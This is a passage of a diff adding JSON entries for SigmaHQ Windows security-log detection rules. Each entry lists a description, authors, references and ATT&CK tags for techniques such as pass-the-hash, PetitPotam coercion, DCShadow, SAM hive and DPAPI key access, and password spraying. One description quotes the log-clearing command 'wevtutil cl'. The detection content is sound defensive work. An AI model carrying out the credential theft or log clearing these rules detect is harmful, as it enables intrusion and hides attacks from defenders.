"windows", + "refs": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" + ] + }, + "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "value": "Successful Overpass the Hash Attempt" + }, + { + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "meta": { + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "creation_date": "2019/06/14", + "falsepositive": [ + "Administrator activity" + ], + "filename": "win_security_pass_the_hash_2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ] + }, + "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "value": "Pass the Hash Activity 2" + }, + { + "description": "Detect PetitPotam coerced authentication activity.", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "Unknown. Feedback welcomed." + ], + "filename": "win_security_petitpotam_network_share.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "value": "Possible PetitPotam Coerce Authentication Attempt" + }, + { + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + ], + "filename": "win_security_petitpotam_susp_tgt_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "value": "PetitPotam Suspicious Kerberos TGT Request" + }, + { + "description": "Detects DCShadow via create new SPN", + "meta": { + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2019/10/25", + "falsepositive": [ + "Valid on domain controllers; exclude known DCs" + ], + "filename": "win_security_possible_dc_shadow.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1207" + ] + }, + "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "value": "Possible DC Shadow Attack" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "value": "PowerShell Scripts Installed as Services - Security" + }, + { + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_protected_storage_service_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", + "value": "Protected Storage Service Access" + }, + { + "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/23", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_security_rare_schtasks_creations.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "value": "Rare Schtasks Creations" + }, + { + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "meta": { + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "creation_date": "2019/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_security_rdp_bluekeep_poc_scanner.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "8400629e-79a9-4737-b387-5db940ab2367", + "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" + }, + { + "description": "RDP login with localhost source address may be a tunnelled login", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_rdp_localhost_login.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" + ] + }, + "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", + "value": "RDP Login from Localhost" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Programs that connect locally to the RDP port" + ], + "filename": "win_security_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "value": "RDP over Reverse SSH Tunnel WFP" + }, + { + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_register_new_logon_process_by_rubeus.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", + "value": "Register new Logon Process by Rubeus" + }, + { + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate use of remote PowerShell execution" + ], + "filename": "win_security_remote_powershell_session.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "value": "Remote PowerShell Sessions Network Connections (WinRM)" + }, + { + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_replay_attack_detected.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", + "value": "Replay Attack Detected" + }, + { + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" + ], + "tags": "No established tags" + }, + "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "value": "Suspicious Computer Account Name Change CVE-2021-42287" + }, + { + "description": "Detects handles requested to SAM registry hive", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sam_registry_hive_handle_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "value": "SAM Registry Hive Handle Request" + }, + { + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "meta": { + "author": "David Strassegger, Tim Shelton", + "creation_date": "2021/01/22", + "falsepositive": [ + "Software installation" + ], + "filename": "win_security_scheduled_task_deletion.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/matthewdunwoody/status/1352356685982146562", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "value": "Scheduled Task Deletion" + }, + { + "description": "Detects non-system users failing to get a handle of the SCM database.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_handle_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1010" + ] + }, + "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "value": "SCM Database Handle Failure" + }, + { + "description": "Detects non-system users performing privileged operation os the SCM database", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_privileged_operation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", + "value": "SCM Database Privileged Operation" + }, + { + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "SCCM" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "value": "Remote WMI ActiveScriptEventConsumers" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "security", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://twitter.com/SBousseaden/status/1490608838701166596", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "value": "Service Installed By Unusual Client - Security" + }, + { + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/08/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_smb_file_creation_admin_shares.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", + "value": "SMB Create Remote File Admin Share" + }, + { + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Legitimate extension of domain structure" + ], + "filename": "win_security_susp_add_domain_trust.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", + "value": "Addition of Domain Trusts" + }, + { + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "meta": { + "author": "Thomas Patzke, @atc_project (improvements)", + "creation_date": "2017/02/19", + "falsepositive": [ + "Migration of an account into a new domain" + ], + "filename": "win_security_susp_add_sid_history.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1772", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" + ] + }, + "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "value": "Addition of SID History to Active Directory Object" + }, + { + "description": "Code integrity failures may indicate tampered executables.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Disk device errors" + ], + "filename": "win_security_susp_codeintegrity_check_failure.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "value": "Failed Code Integrity Checks" + }, + { + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "meta": { + "author": "elhoim", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_computer_name.yml", + "level": "critical", + "logsource.category": "security", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" + ], + "tags": [ + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "value": "Win Susp Computer Name Containing Samtheadmin" + }, + { + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Initial installation of a domain controller" + ], + "filename": "win_security_susp_dsrm_password_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1714", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "value": "Password Change on Directory Service Restore Mode (DSRM) Account" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_security_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "value": "Security Eventlog Cleared" + }, + { + "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", + "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials" + }, + { + "description": "Detects failed logins with multiple accounts from a single process on the system.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_process.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", + "value": "Multiple Users Failing to Authenticate from Single Process" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", + "value": "Failed Logins with Different Accounts from Single Source System" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", + "value": "Failed NTLM Logins with Different Accounts from Single Source System" + }, + { + "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", + "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", + "value": "Disabled Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", + "value": "Invalid Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", + "value": "Valid Users Failing to Authenticate from Single Source Using NTLM" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" + ], + "tags": [ + "attack.t1110.003", + 